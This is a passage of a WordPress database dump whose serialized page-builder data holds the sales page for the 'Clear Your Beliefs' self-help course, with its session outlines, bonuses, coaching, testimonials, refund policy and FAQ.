vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1565, 2013, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:2:"27";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:2:"28";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:2:"29";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:2:"30";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:2:"31";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come 